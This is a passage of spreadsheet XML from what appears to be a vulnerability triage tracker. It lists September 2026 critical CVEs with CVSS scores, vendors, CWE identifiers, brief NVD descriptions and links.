        <v>0.006</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S12"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T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S13"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T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48273</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="S14"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T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78234</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql, keycloak</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S16"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T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12744</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12745</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28606</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S19"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T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49921</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="S21"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T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58822</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</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2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61516</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69276</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69408</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69491</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
